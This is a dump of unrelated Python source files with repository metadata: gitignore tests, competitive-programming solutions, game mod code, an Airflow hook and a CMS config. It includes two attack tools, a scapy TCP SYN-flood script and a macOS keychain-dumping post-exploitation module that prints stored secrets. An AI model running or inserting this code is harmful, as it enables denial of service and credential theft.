        Tests a single root absolute path pattern.

        This should NOT match any file (according to git check-ignore (v2.4.1)).
        """
        spec = GitIgnorePattern('/')
        self.assertIsNone(spec.include)
        self.assertIsNone(spec.regex)

    def test_01_absolute(self):
        """
        Tests an absolute path pattern.

        This should match:
            an/absolute/file/path
            an/absolute/file/path/foo

        This should NOT match:
            foo/an/absolute/file/path
        """
        spec = GitIgnorePattern('/an/absolute/file/path')
        self.assertTrue(spec.include)
        self.assertEqual(spec.regex.pattern, '^an/absolute/file/path(?:/.*)?$')

    def test_01_relative(self):
        """
        Tests a relative path pattern.

        This should match:
            spam
            spam/
            foo/spam
            spam/foo
            foo/spam/bar
        """
        spec = GitIgnorePattern('spam')
        self.assertTrue(spec.include)
        self.assertEqual(spec.regex.pattern, '^(?:.+/)?spam(?:/.*)?$')

    def test_01_relative_nested(self):
        """
        Tests a relative nested path pattern.

        This should match:
            foo/spam
            foo/spam/bar

        This should **not** match (according to git check-ignore (v2.4.1)):
            bar/foo/spam
        """
        spec = GitIgnorePattern('foo/spam')
        self.assertTrue(spec.include)
        self.assertEqual(spec.regex.pattern, '^foo/spam(?:/.*)?$')

    def test_02_comment(self):
        """
        Tests a comment pattern.
        """
        spec = GitIgnorePattern('# Cork soakers.')
        self.assertIsNone(spec.include)
        self.assertIsNone(spec.regex)

    def test_02_ignore(self):
        """
        Tests an exclude pattern.

        This should NOT match (according to git check-ignore (v2.4.1)):
            temp/foo
        """
        spec = GitIgnorePattern('!temp')
        # '!' negates: the pattern still compiles but flags exclusion.
        self.assertIsNotNone(spec.include)
        self.assertFalse(spec.include)
        self.assertEqual(spec.regex.pattern, '^(?:.+/)?temp$')

    def test_03_child_double_asterisk(self):
        """
        Tests a directory name with a double-asterisk child
        directory.

        This should match:
            spam/bar

        This should **not** match (according to git check-ignore (v2.4.1)):
            foo/spam/bar
        """
        spec = GitIgnorePattern('spam/**')
        self.assertTrue(spec.include)
        self.assertEqual(spec.regex.pattern, '^spam/.*$')

    def test_03_inner_double_asterisk(self):
        """
        Tests a path with an inner double-asterisk directory.

        This should match:
            left/bar/right
            left/foo/bar/right
            left/bar/right/foo

        This should **not** match (according to git check-ignore (v2.4.1)):
            foo/left/bar/right
        """
        spec = GitIgnorePattern('left/**/right')
        self.assertTrue(spec.include)
        self.assertEqual(spec.regex.pattern, '^left(?:/.+)?/right(?:/.*)?$')

    def test_03_only_double_asterisk(self):
        """
        Tests a double-asterisk pattern which matches everything.
        """
        spec = GitIgnorePattern('**')
        self.assertTrue(spec.include)
        self.assertEqual(spec.regex.pattern, '^.+$')

    def test_03_parent_double_asterisk(self):
        """
        Tests a file name with a double-asterisk parent directory.

        This should match:
            foo/spam
            foo/spam/bar
        """
        spec = GitIgnorePattern('**/spam')
        self.assertTrue(spec.include)
        self.assertEqual(spec.regex.pattern, '^(?:.+/)?spam(?:/.*)?$')

    def test_04_infix_wildcard(self):
        """
        Tests a pattern with an infix wildcard.

        This should match:
            foo--bar
            foo-hello-bar
            a/foo-hello-bar
            foo-hello-bar/b
            a/foo-hello-bar/b
        """
        spec = GitIgnorePattern('foo-*-bar')
        self.assertTrue(spec.include)
        # '*' translates to [^/]* — it never crosses a path separator.
        self.assertEqual(spec.regex.pattern, '^(?:.+/)?foo\\-[^/]*\\-bar(?:/.*)?$')

    def test_04_postfix_wildcard(self):
        """
        Tests a pattern with a postfix wildcard.

        This should match:
            ~temp-
            ~temp-foo
            ~temp-foo/bar
            foo/~temp-bar
            foo/~temp-bar/baz
        """
        spec = GitIgnorePattern('~temp-*')
        self.assertTrue(spec.include)
        self.assertEqual(spec.regex.pattern, '^(?:.+/)?\\~temp\\-[^/]*(?:/.*)?$')

    def test_04_prefix_wildcard(self):
        """
        Tests a pattern with a prefix wildcard.

        This should match:
            bar.py
            bar.py/
            foo/bar.py
            foo/bar.py/baz
        """
        spec = GitIgnorePattern('*.py')
        self.assertTrue(spec.include)
        self.assertEqual(spec.regex.pattern, '^(?:.+/)?[^/]*\\.py(?:/.*)?$')

    def test_05_directory(self):
        """
        Tests a directory pattern.

        This should match:
            dir/
            foo/dir/
            foo/dir/bar

        This should **not** match:
            dir
        """
        spec = GitIgnorePattern('dir/')
        self.assertTrue(spec.include)
        # Trailing slash restricts the match to directories (contents only).
        self.assertEqual(spec.regex.pattern, '^(?:.+/)?dir/.*$')

    def test_05_registered(self):
        """
        Tests that the pattern is registered.
        """
        self.assertIs(pathspec.util.lookup_pattern('gitignore'), GitIgnorePattern)


if __name__ == '__main__':
    suite = unittest.TestLoader().loadTestsFromTestCase(GitIgnoreTest)
    unittest.TextTestRunner(verbosity=2).run(suite)
|
[
"[email protected]"
] | |
e914343fa85ca6d3f23aeda9938362687fbe0344
|
20c20938e201a0834ccf8b5f2eb5d570d407ad15
|
/abc146/abc146_c/8937880.py
|
ee9c12a0ce700fce574a65e29313213efa3efaa3
|
[] |
no_license
|
kouhei-k/atcoder_submissions
|
8e1a1fb30c38e0d443b585a27c6d134bf1af610a
|
584b4fd842ccfabb16200998fe6652f018edbfc5
|
refs/heads/master
| 2021-07-02T21:20:05.379886 | 2021-03-01T12:52:26 | 2021-03-01T12:52:26 | 227,364,764 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 272 |
py
|
# ABC146 C: largest N (1..10^9) whose total cost A*N + B*digits(N)
# still fits in the budget X. Found by binary search over N.
A, B, X = map(int, input().split())

lo, hi = 1, 10**9
best = 0
while True:
    mid = (lo + hi) // 2
    cost = A * mid + len(str(mid)) * B
    if cost <= mid * 0 + X:  # affordable: remember it as a candidate
        best = mid
    if lo == hi:
        break
    if cost < X:
        lo = mid + 1   # strictly under budget: try larger N
    else:
        hi = mid       # at or over budget: shrink the upper bound
print(best)
|
[
"[email protected]"
] | |
30ac3811a3b1bd1fe781ad76f925c49dc1176111
|
84888c7f9d6d7195917053b2d14b2d30e1e5e375
|
/stress_testing/tcp_syn_flood.py
|
165848ca4522c0e0c341fb99281fc5f23da65896
|
[] |
no_license
|
codeandrew/offensivesecurity-python
|
a8d48c565d2434430e6f0e3069385b19dfbdef60
|
364ff7233c31a4a853f9ef185f96078e50c7bef4
|
refs/heads/master
| 2023-08-17T11:23:44.852329 | 2023-08-02T14:54:37 | 2023-08-02T14:54:37 | 242,969,080 | 12 | 5 | null | 2023-09-04T16:45:25 | 2020-02-25T10:10:59 |
Python
|
UTF-8
|
Python
| false | false | 628 |
py
|
from scapy.all import *
import sys
def main(target_ip, target_port, rounds=10_000):
    """Send `rounds` TCP packets with the SYN flag set to target_ip:target_port.

    NOTE(review): stress-testing tool — only run against hosts you are
    authorized to test.

    :param target_ip: destination IPv4 address (string).
    :param target_port: destination TCP port (int).
    :param rounds: number of packets to craft and send (default 10_000).
    """
    print(f"Target IP: {target_ip}")
    print(f"Target Port: {target_port}")
    print(f"Rounds: {rounds}")

    # Define the payload to send in the packets
    payload = "A" * 1024

    # Create a loop to send a large number of packets to the target
    for i in range(rounds):
        # flags="S" marks each crafted packet as a TCP SYN.
        packet = IP(dst=target_ip) / TCP(dport=target_port, flags="S") / payload
        send(packet, verbose=False)


if __name__ == "__main__":
    # Usage: tcp_syn_flood.py <target_ip> <target_port>
    target_ip = sys.argv[1]
    target_port = int(sys.argv[2])
    main(target_ip=target_ip, target_port=target_port)
|
[
"[email protected]"
] | |
7c9e003239f263252fb0adea540bb5e1962cd733
|
b3b68efa404a7034f0d5a1c10b281ef721f8321a
|
/src/sims4communitylib/enums/common_species.py
|
eacddcd09423a491b7c32754f111f81175abc65a
|
[
"Apache-2.0"
] |
permissive
|
velocist/TS4CheatsInfo
|
62195f3333076c148b2a59f926c9fb5202f1c6fb
|
b59ea7e5f4bd01d3b3bd7603843d525a9c179867
|
refs/heads/main
| 2023-03-08T01:57:39.879485 | 2021-02-13T21:27:38 | 2021-02-13T21:27:38 | 337,543,310 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,376 |
py
|
"""
The Sims 4 Community Library is licensed under the Creative Commons Attribution 4.0 International public license (CC BY 4.0).
https://creativecommons.org/licenses/by/4.0/
https://creativecommons.org/licenses/by/4.0/legalcode
Copyright (c) COLONOLNUTTY
"""
from sims.sim_info import SimInfo
from sims4communitylib.enums.enumtypes.common_int import CommonInt
class CommonSpecies(CommonInt):
    """Custom Species enum containing all species (including extended species).
    """
    INVALID: 'CommonSpecies' = 0
    HUMAN: 'CommonSpecies' = 1
    SMALL_DOG: 'CommonSpecies' = 2
    LARGE_DOG: 'CommonSpecies' = 3
    CAT: 'CommonSpecies' = 4

    @staticmethod
    def get_species(sim_info: SimInfo) -> 'CommonSpecies':
        """Map a sim to its CommonSpecies value. Prefer this over
        CommonSpeciesUtils.get_species when the more specific (extended)
        species is needed.
        """
        from sims4communitylib.utils.sims.common_species_utils import CommonSpeciesUtils
        # Ordered predicate table; first match wins.
        checks = (
            (CommonSpeciesUtils.is_human, CommonSpecies.HUMAN),
            (CommonSpeciesUtils.is_small_dog, CommonSpecies.SMALL_DOG),
            (CommonSpeciesUtils.is_large_dog, CommonSpecies.LARGE_DOG),
            (CommonSpeciesUtils.is_cat, CommonSpecies.CAT),
        )
        for predicate, species in checks:
            if predicate(sim_info):
                return species
        return CommonSpecies.INVALID
|
[
"[email protected]"
] | |
413f0b7b9ab12d75b76ef41418717665a490a242
|
d489eb7998aa09e17ce8d8aef085a65f799e6a02
|
/lib/modules/python/collection/osx/keychaindump_decrypt.py
|
64015ea23ade2de15835ef86ce40b32770ac9187
|
[
"MIT"
] |
permissive
|
fengjixuchui/invader
|
d36078bbef3d740f95930d9896b2d7dd7227474c
|
68153dafbe25e7bb821c8545952d0cc15ae35a3e
|
refs/heads/master
| 2020-07-21T19:45:10.479388 | 2019-09-26T11:32:38 | 2019-09-26T11:32:38 | 206,958,809 | 2 | 1 |
MIT
| 2019-09-26T11:32:39 | 2019-09-07T11:32:17 |
PowerShell
|
UTF-8
|
Python
| false | false | 3,432 |
py
|
class Module:
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'Sandbox-Keychain-Dump',
# list of one or more authors for the module
'Author': ['@import-au'],
# more verbose multi-line description of the module
'Description': ("Uses Apple Security utility to dump the contents of the keychain. "
"WARNING: Will prompt user for access to each key."
"On Newer versions of Sierra and High Sierra, this will also ask the user for their password for each key."),
# True if the module needs to run in the background
'Background' : False,
# File extension to save the file as
'OutputExtension' : "",
# if the module needs administrative privileges
'NeedsAdmin' : False,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe' : False,
# the module language
'Language' : 'python',
# the minimum language version needed
'MinLanguageVersion' : '2.6',
# list of any references/other comments
'Comments': [
""
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to execute module on.',
'Required' : True,
'Value' : ''
},
'OutFile' : {
'Description': 'File to output AppleScript to, otherwise displayed on the screen.',
'Required': False,
'Value': ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
script = r"""
import subprocess
import re
process = subprocess.Popen('/usr/bin/security dump-keychain -d', stdout=subprocess.PIPE, shell=True)
keychain = process.communicate()
find_account = re.compile('0x00000007\s\<blob\>\=\"([^\"]+)\"\n.*\n.*\"acct\"\<blob\>\=\"([^\"]+)\"\n.*\n.*\n.*\n\s+\"desc\"\<blob\>\=([^\n]+)\n.*\n.*\n.*\n.*\n.*\n.*\n.*\n.*\n.*\ndata\:\n([^\n]+)')
accounts = find_account.findall(keychain[0])
for account in accounts:
print("System: " + account[0])
print("Description: " + account[2])
print("Username: " + account[1])
print("Secret: " + account[3])
"""
return script
|
[
"[email protected]"
] | |
b9c35bacbba1122e7bf5ad1531e085007384e51a
|
f023692f73992354a0b7823d9c49ae730c95ab52
|
/AtCoderRegularContest/132/C.py
|
3e94b88d37560e4a0f7c839099cf78a2907fed1a
|
[] |
no_license
|
corutopi/AtCorder_python
|
a959e733f9a3549fab7162023e414ac2c99c4abe
|
a2c78cc647076071549e354c398155a65d5e331a
|
refs/heads/master
| 2023-08-31T09:40:35.929155 | 2023-08-20T06:19:35 | 2023-08-20T06:19:35 | 197,030,129 | 1 | 0 | null | 2022-06-22T04:06:28 | 2019-07-15T15:57:34 |
Python
|
UTF-8
|
Python
| false | false | 1,979 |
py
|
"""
解説AC
変則dp
"""
# import sys
# sys.setrecursionlimit(10 ** 6)
# # for pypy
# import pypyjit
# pypyjit.set_param('max_unroll_recursion=-1')
# import bisect
# from collections import deque
# import string
from math import ceil, floor
inf = float('inf')
mod = 10 ** 9 + 7
mod2 = 998244353
# from decorator import stop_watch
#
#
# @stop_watch
def solve(N, D, A):
    """Bitmask DP over a sliding window of 2*D+1 positions (ARC132 C).

    Counts permutations consistent with the partially-fixed array A,
    where each value may move at most D from its natural position.
    Answer is printed modulo 998244353 (mod2).
    """
    # Pad with D sentinel slots on each side so every real position has a
    # full window; shift fixed values by D-1 to the padded index space.
    A = [i for i in range(D)] + [a + D - 1 if a != -1 else a for a in A] + \
        [N + D + i for i in range(D)]
    used = [0] * len(A)
    for a in A:
        used[a] = 1 if a != -1 else used[a]
    # dp state: bitmask over the 2*D+1-wide window of which nearby values
    # are already placed.
    dp = [0] * 2 ** (2 * D + 1)
    dp[(1 << (D + 1)) - 1] = 1
    for i in range(D, N + D):
        dp_new = [0] * 2 ** (2 * D + 1)
        for j in range(2 ** (2 * D + 1)):
            # Skip states where position i - D - 1 was never filled.
            # Without this pruning Python is too slow to pass.
            if not j & 1: continue
            if A[i] != -1:
                # Case: the value at position i is fixed.
                if not (j >> (A[i] - i + D + 1) & 1):
                    tmp = j >> 1 | 1 << (A[i] - i + D)
                    dp_new[tmp] += dp[j]
                    dp_new[tmp] %= mod2
            else:
                # Case: position i is free (-1) — try every value in range.
                for k in range(2 * D + 1):
                    if used[i + k - D]: continue  # value already taken by a fixed slot
                    if not (j >> (k + 1)) & 1:
                        tmp = j >> 1 | 1 << k
                        dp_new[tmp] += dp[j]
                        dp_new[tmp] %= mod2
        dp = dp_new
    print(sum(dp))


if __name__ == '__main__':
    # S = input()
    # N = int(input())
    N, D = map(int, input().split())
    A = [int(i) for i in input().split()]
    solve(N, D, A)
# # test
# from random import randint
# import string
# import tool.testcase as tt
# from tool.testcase import random_str, random_ints
# solve()
|
[
"[email protected]"
] | |
069869c1802fa40cf5d5a5437907958a0bfa9e2d
|
ad13583673551857615498b9605d9dcab63bb2c3
|
/output/instances/nistData/list/nonNegativeInteger/Schema+Instance/NISTXML-SV-IV-list-nonNegativeInteger-enumeration-3-1.py
|
0a96f1ef465b374d9e5d0791ff5bc20220dcdd83
|
[
"MIT"
] |
permissive
|
tefra/xsdata-w3c-tests
|
397180205a735b06170aa188f1f39451d2089815
|
081d0908382a0e0b29c8ee9caca6f1c0e36dd6db
|
refs/heads/main
| 2023-08-03T04:25:37.841917 | 2023-07-29T17:10:13 | 2023-07-30T12:11:13 | 239,622,251 | 2 | 0 |
MIT
| 2023-07-25T14:19:04 | 2020-02-10T21:59:47 |
Python
|
UTF-8
|
Python
| false | false | 695 |
py
|
from output.models.nist_data.list_pkg.non_negative_integer.schema_instance.nistschema_sv_iv_list_non_negative_integer_enumeration_3_xsd.nistschema_sv_iv_list_non_negative_integer_enumeration_3 import NistschemaSvIvListNonNegativeIntegerEnumeration3
from output.models.nist_data.list_pkg.non_negative_integer.schema_instance.nistschema_sv_iv_list_non_negative_integer_enumeration_3_xsd.nistschema_sv_iv_list_non_negative_integer_enumeration_3 import NistschemaSvIvListNonNegativeIntegerEnumeration3Type

# Generated xsdata conformance instance: binds one of the schema's fixed
# enumeration values (a list of nonNegativeInteger tokens) to the element.
obj = NistschemaSvIvListNonNegativeIntegerEnumeration3(
    value=NistschemaSvIvListNonNegativeIntegerEnumeration3Type.VALUE_693_7324_20_7475_4947489_80584759_9768357488_66469880_746558290
)
|
[
"[email protected]"
] | |
a99e5fd938668998f40d71595197fe4eabfea880
|
7cd36fa026bb922e438905819e97d7ed208dc49e
|
/examples/advanced/thinplate_morphing.py
|
d0515987197e12cfdcdd0e91e7e65d6ca9ab8b07
|
[
"MIT"
] |
permissive
|
lxychuanhai/vtkplotter
|
b267bfcbbee5c7733ac98f5327e311c9529c74b1
|
bc1b8b8821095263a46bba20ca345cab1d70cc42
|
refs/heads/master
| 2020-11-25T15:25:33.597049 | 2019-12-17T18:49:05 | 2019-12-17T18:49:05 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 808 |
py
|
"""
Warp the tip of a mesh using Thin Plate Splines.
Red points stay fixed while a single point in space
moves as the arrow shows.
"""
from vtkplotter import *
mesh = load(datadir+"man.vtk").normalize()
meshd = mesh.clone().decimate(N=100) # a heavily decimated copy
sources = [[0.0, 1.0, 0.2]] # this point moves
targets = [[0.3, 1.3, 0.4]] # to this.
for pt in meshd.getPoints():
if pt[1] < 0.3: # these pts don't move
sources.append(pt) # source = target
targets.append(pt)
# calculate the warping T on the reduced mesh
T = thinPlateSpline(meshd, sources, targets).getTransform()
warp = mesh.clone().transformMesh(T).c("blue").alpha(0.4)
apts = Points(sources).c("red")
arro = Arrow(sources[0], targets[0])
show(mesh, arro, warp, apts, Text(__doc__), viewup="z", axes=1)
|
[
"[email protected]"
] | |
1d94a7aaf0160f003ff3934bba18e8f21ae50052
|
69a576aa60918b3b846963da2238931468e354ab
|
/utils/spatial.py
|
48c11f134472aad99921594a9b5bfddc25d536b5
|
[] |
no_license
|
parallel-ml/stand-alone
|
3d04a31d442bf422d67d2f0a1f03eb04bdb841c7
|
c86ce0d632188e9e16fb5539a7e2baed2c40ecdb
|
refs/heads/master
| 2020-03-29T10:49:48.426742 | 2018-11-20T16:40:35 | 2018-11-20T16:40:35 | 149,824,728 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,044 |
py
|
"""
This module implements single Conv2D layer spatial split.
It provides an example of 2 division and another generalized
example. The arithmetic technique is discussed in 2 division
example.
"""
from keras.layers import Conv2D, Lambda, ZeroPadding2D
from keras.layers.merge import Concatenate
import keras.backend as K
import math
def split_xy(X, kernal, strides, padding, num):
    """Split a 4D tensor (batch, W, H, C) into num*num overlapping spatial
    chunks, so that a convolution applied per-chunk reproduces the output
    of convolving the whole tensor.

    FIX: all chunk-size/boundary arithmetic now uses floor division (//).
    Under Python 3 the original true division (/) produced floats, which
    are invalid as slice indices and range bounds; // is identical for
    ints under Python 2, so this is backward-compatible.

    :param X: input Keras tensor of shape (batch, W, H, C).
    :param kernal: (kw, kh) convolution kernel size.
    :param strides: (ws, hs) convolution strides.
    :param padding: 'same' or 'valid'; 'same' is resolved here by explicit
        zero-padding so the downstream conv can always use 'valid'.
    :param num: number of splits per spatial axis (num*num chunks total).
    :return: list of num*num tensor chunks (row-major order).
    """
    # Resolve 'same' padding up front with an explicit ZeroPadding2D so the
    # per-chunk convolution can run with padding='valid'.
    if padding == 'same':
        wk, hk = kernal
        ws, hs = strides
        _, W, H, _ = K.int_shape(X)
        # Output size of a 'same' conv is ceil(dim / stride).
        ow, oh = W // ws, H // hs
        if W % ws != 0:
            ow += 1
        if H % hs != 0:
            oh += 1
        # Total padding needed so the strided kernel covers the input.
        wp, hp = (ow - 1) * ws + wk - W, (oh - 1) * hs + hk - H
        wp, hp = wp if wp >= 0 else 0, hp if hp >= 0 else 0
        X = ZeroPadding2D(padding=((hp // 2, hp - hp // 2), (wp // 2, wp - wp // 2)))(X)

    wk, hk = kernal
    ws, hs = strides
    _, W, H, _ = K.int_shape(X)
    # Output size of a 'valid' conv.
    ow, oh = (W - wk) // ws + 1, (H - hk) // hs + 1
    # Input span needed to produce one chunk of output.
    wchunk, hchunk = ow // num, oh // num
    rw, rh = (wchunk - 1) * ws + wk, (hchunk - 1) * hs + hk
    # The last chunk absorbs the remainder when ow/oh don't divide evenly.
    wlchunk, hlchunk = ow - (num - 1) * wchunk, oh - (num - 1) * hchunk
    lrw, lrh = (wlchunk - 1) * ws + wk, (hlchunk - 1) * hs + hk

    # Overlap correction: when the kernel is wider than the stride,
    # neighboring chunks must share (kernel - stride) columns/rows.
    offset = lambda kernals, strides, i: (kernals - strides) * i if kernals - strides > 0 else 0

    # Build (left, right, up, down) input boundaries for every chunk,
    # row-major; the last row/column use the remainder-sized spans.
    boundary = []
    for r in range(num):
        for c in range(num):
            if r == num - 1 and c == num - 1:
                boundary.append((W - lrw, W, H - lrh, H))
            elif r == num - 1:
                boundary.append((rw * c - offset(wk, ws, c), rw * c - offset(wk, ws, c) + rw, H - lrh, H))
            elif c == num - 1:
                boundary.append((W - lrw, W, rh * r - offset(hk, hs, r), rh * r - offset(hk, hs, r) + rh))
            else:
                boundary.append(
                    (
                        rw * c - offset(wk, ws, c),
                        rw * c - offset(wk, ws, c) + rw,
                        rh * r - offset(hk, hs, r),
                        rh * r - offset(hk, hs, r) + rh,
                    )
                )

    # Slice all chunks inside one Lambda so the split stays in the Keras graph.
    return Lambda(
        lambda x:
        [x[:, lb:rb, ub:db, :] for lb, rb, ub, db in boundary]
    )(X)
def merge(tensors):
    """Reassemble num*num row-major chunks: stack each row vertically
    (axis 1), then join the rows horizontally (axis 2).
    """
    size = int(math.sqrt(len(tensors)))
    rows = []
    for k in range(size):
        rows.append(Concatenate(axis=1)(tensors[k * size:k * size + size]))
    return Concatenate(axis=2)(rows)
def conv(tensors, filters, kernal, strides, padding, activation, name):
    """Apply one weight-shared Conv2D layer to every spatial chunk."""
    shared_layer = Conv2D(filters, kernal, strides=strides, padding=padding,
                          activation=activation, name=name + '_conv')
    outputs = []
    for chunk in tensors:
        outputs.append(shared_layer(chunk))
    return outputs
|
[
"[email protected]"
] | |
4fd1a36063610493d16705b91faca3442fdc810a
|
480e33f95eec2e471c563d4c0661784c92396368
|
/Geometry/HGCalCommonData/test/python/dumpTBGeometryDDD_cfg.py
|
998122a85ad6a346ff919cce319dcc301f314db8
|
[
"Apache-2.0"
] |
permissive
|
cms-nanoAOD/cmssw
|
4d836e5b76ae5075c232de5e062d286e2026e8bd
|
4eccb8a758b605875003124dd55ea58552b86af1
|
refs/heads/master-cmsswmaster
| 2021-01-23T21:19:52.295420 | 2020-08-27T08:01:20 | 2020-08-27T08:01:20 | 102,867,729 | 7 | 14 |
Apache-2.0
| 2022-05-23T07:58:09 | 2017-09-08T14:03:57 |
C++
|
UTF-8
|
Python
| false | false | 821 |
py
|
import FWCore.ParameterSet.Config as cms

# cmsRun configuration: dump the HGCal test-beam (TB181) geometry to a
# ROOT file via the DumpSimGeometry analyzer.
process = cms.Process("DUMP")
process.load("Geometry.HGCalCommonData.testTB181XML_cfi")
process.load('FWCore.MessageService.MessageLogger_cfi')

# Route Geant4 and HGCal geometry messages through the MessageLogger.
if 'MessageLogger' in process.__dict__:
    process.MessageLogger.categories.append('G4cerr')
    process.MessageLogger.categories.append('G4cout')
    process.MessageLogger.categories.append('HGCalGeom')

# No event data needed — run exactly one empty event.
process.source = cms.Source("EmptySource")
process.maxEvents = cms.untracked.PSet(
    input = cms.untracked.int32(1)
)

# Build the TGeo representation from the DDD description (dump depth 14).
process.add_(cms.ESProducer("TGeoMgrFromDdd",
    verbose = cms.untracked.bool(False),
    level = cms.untracked.int32(14)
))

process.dump = cms.EDAnalyzer("DumpSimGeometry",
    outputFileName = cms.untracked.string('TBGeom.root'))

process.p = cms.Path(process.dump)
|
[
"[email protected]"
] | |
bce38b1477870007035b59a1dc2f07b2775b04fa
|
487ce91881032c1de16e35ed8bc187d6034205f7
|
/codes/CodeJamCrawler/16_0_3/Himanshu.Mishra/problem.py
|
abd5a6a5b627365883042f53a6cc564bc5e737e7
|
[] |
no_license
|
DaHuO/Supergraph
|
9cd26d8c5a081803015d93cf5f2674009e92ef7e
|
c88059dc66297af577ad2b8afa4e0ac0ad622915
|
refs/heads/master
| 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 |
Python
|
UTF-8
|
Python
| false | false | 1,389 |
py
|
def isprime(n):
    """Return True if n is prime.

    FIX: the original used a single Fermat test (pow(2, n-1, n) == 1),
    which wrongly reports base-2 pseudoprimes such as 341 = 11*31 as
    prime. Replaced with Miller-Rabin over the first twelve prime bases,
    which is deterministic for all n < 3.3 * 10**24 and has no known
    counterexamples beyond that.
    """
    if n < 2:
        return False
    small_primes = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)
    # Quick trial division; also handles n being one of the small primes.
    for p in small_primes:
        if n % p == 0:
            return n == p
    # Write n - 1 = d * 2**r with d odd.
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    # Miller-Rabin witness loop: n survives every base => prime.
    for a in small_primes:
        x = pow(a, d, n)
        if x == 1 or x == n - 1:
            continue
        for _ in range(r - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True
# def isprime(n):
# """Returns True if n is prime."""
# if n == 2:
# return True
# if n == 3:
# return True
# if n % 2 == 0:
# return False
# if n % 3 == 0:
# return False
# i = 5
# w = 2
# while i * i <= n:
# if n % i == 0:
# return False
# i += w
# w = 6 - w
# return True
def isDivisibleBy(num):
    """Return the smallest factor of num greater than 1, or None when num
    has no such factor below itself (i.e. num is prime or num < 4).

    FIX: the original trial-divided all the way up to num (O(n)); the
    smallest nontrivial factor of a composite is always <= sqrt(num), so
    stopping at i*i <= num returns the identical result in O(sqrt n).
    """
    i = 2
    while i * i <= num:
        if num % i == 0:
            return i
        i += 1
    return None
def main():
    """Search for Code Jam 'jamcoin'-style outputs: odd binary strings of
    length N+1 (here N=32) that are composite when interpreted in every
    base 2..10, printing each base-10 interpretation followed by a factor
    witness for each base. Stops after 700 results (count threshold).
    """
    data = []
    print("Case #1:")
    # data[i] = [first, last] odd-endpoint range of (i+1)-bit numbers whose
    # binary form starts and ends with 1: [2**i + 1, 2**(i+1) - 1].
    for i in range(35):
        num = 2**i
        # print(num, len(bin(num)[2:]), bin(num+1)[2:], bin(int(num*2-1))[2:])
        data.append([num+1, int(num*2-1)])
    N = 32  # bit-length index selecting which range to scan
    count = 0
    startingNumber = data[N-1][0]
    finalNumber = data[N-1][1]
    # Step by 2: candidates must end in 1 (odd) so the last binary digit is 1.
    for i in range(startingNumber, finalNumber+1, 2):
        numstr = bin(i)[2:]
        # Interpret the same digit string in every base from 2 to 10.
        base = [int(numstr, 2), int(numstr, 3), int(numstr, 4), int(numstr, 5), int(numstr, 6), int(numstr, 7), int(numstr, 8), int(numstr, 9), int(numstr, 10)]
        # print(base)
        # flag == 1 only if every interpretation is composite (non-prime).
        flag = 0
        for j in base:
            if not isprime(j):
                flag = 1
            else:
                flag = 0
                break
        if flag == 1:
            if count >= 700:
                break
            else:
                count = count + 1
                # base[10-2] is the base-10 interpretation; append one
                # nontrivial-divisor witness per base.
                answer = str(base[10-2])
                for k in base:
                    answer += " " + str(isDivisibleBy(k))
                print(answer)


if __name__ == '__main__':
    main()
|
[
"[[email protected]]"
] | |
59aec718fce53f6051be2ea2d5f6ec1380b3bfd2
|
c7027edceeae907ce7d21112336e84f101eeb89b
|
/airflow/providers/sqlite/hooks/sqlite.py
|
5a14249ca5902174edf5d6b29c533545cbd950d7
|
[
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] |
permissive
|
jao6693/airflow
|
0a8027ce33e20ee8f6032facb1b8ab453c2d20d4
|
269b608246b015c55e6cae4ed0f50b1e2bb0fa95
|
refs/heads/main
| 2023-01-30T18:53:23.431745 | 2022-11-05T14:59:27 | 2022-11-05T14:59:27 | 320,338,180 | 0 | 0 |
Apache-2.0
| 2020-12-10T17:08:36 | 2020-12-10T17:08:35 | null |
UTF-8
|
Python
| false | false | 1,618 |
py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import sqlite3
from airflow.providers.common.sql.hooks.sql import DbApiHook
class SqliteHook(DbApiHook):
    """Hook for interacting with a local SQLite database file.

    The Airflow connection's ``host`` field is interpreted as the path to
    the SQLite database file.
    """

    # Identifiers used by Airflow's connection/registration machinery.
    conn_name_attr = 'sqlite_conn_id'
    default_conn_name = 'sqlite_default'
    conn_type = 'sqlite'
    hook_name = 'Sqlite'
    placeholder = '?'

    def _database_path(self) -> str:
        """Resolve the configured Airflow connection and return its host
        field (the SQLite database file path)."""
        return self.get_connection(getattr(self, self.conn_name_attr)).host

    def get_conn(self) -> sqlite3.dbapi2.Connection:
        """Returns a sqlite connection object"""
        return sqlite3.connect(self._database_path())

    def get_uri(self) -> str:
        """Override DbApiHook get_uri method for get_sqlalchemy_engine()"""
        return "sqlite:///" + self._database_path()
|
[
"[email protected]"
] | |
c643c289d6a7b2f99414e9f9a7bb4a558e5ac8c3
|
d79f3a31d173f18ec112c521acdcee8e8e73724d
|
/test5.py
|
